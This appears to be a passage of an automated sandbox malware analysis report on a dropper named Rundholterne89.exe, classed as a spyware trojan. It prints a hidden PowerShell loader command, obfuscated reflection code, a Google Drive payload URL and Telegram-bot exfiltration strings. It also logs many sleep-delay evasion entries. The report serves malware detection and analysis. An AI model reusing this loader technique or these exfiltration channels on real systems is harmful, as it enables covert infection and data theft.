Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: Rundholterne89.exe, Rundholterne89.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Rundholterne89.exe, Rundholterne89.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://smtp.ionos.es
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://status.geotrust.com0
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.2625379700.00000000233CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2625379700.00000000233C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/l
Source: msiexec.exe, 00000006.00000002.2623609506.00000000226A0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANCO
          Source: msiexec.exe, 00000006.00000002.2603668887.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2603668887.000000000069A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023287000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49709 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.10:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00405086

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_0040310F
          Source: Rundholterne89.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/14@6/6
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA | 0_2_00404352
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar | 0_2_0040205E
          Source: C:\Users\user\Desktop\Rundholterne89.exe | File created: C:\Users\user\AppData\Roaming\underarmsmusklens
          Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
          Source: C:\Users\user\Desktop\Rundholterne89.exe | File created: C:\Users\user\AppData\Local\Temp\nsr6A1.tmp
          Source: Rundholterne89.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\Rundholterne89.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Rundholterne89.exe | ReversingLabs: Detection: 42%
          Source: C:\Users\user\Desktop\Rundholterne89.exe | File read: C:\Users\user\Desktop\Rundholterne89.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Rundholterne89.exe "C:\Users\user\Desktop\Rundholterne89.exe"
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\Rundholterne89.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Rundholterne89.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unbristled191 $Disobedient $Leddelings), (Bunodont @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anseeligt = [AppDomain]::CurrentDomain.GetAssemblies()$g
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Realkreditinstitutterne)), $Bdeforelgget215bidances).DefineDynamicModule($Resknderiernes, $false).DefineType($Anatreptic39, $Renunciab
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_043DCA78 push eax; mov dword ptr [esp], edx 2_2_043DCA8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_043DD610 push esp; iretd 2_2_043DD611
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_043DD0B0 pushad ; retf 2_2_043DD0B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_087E41A6 push 3B640E4Eh; ret 2_2_087E41AD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599157Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599032Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598919Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598804Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598668Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598447Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596949Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596238Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595667Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595449Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6053
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3639
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 | Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep count: 36 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -33204139332677172s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599875s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120 | Thread sleep count: 7324 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120 | Thread sleep count: 2500 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599766s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599657s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599532s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599407s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599282s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599157s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -599032s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598919s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598804s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598668s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598562s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598447s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598234s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598125s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -598016s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597907s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597782s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597672s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597563s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597438s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597313s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597188s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -597063s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596949s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596844s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596719s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596610s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596485s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596360s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596238s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -596110s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595985s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595797s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595667s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595449s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595235s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -595110s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594985s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594860s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594735s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594610s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594485s >= -30000s
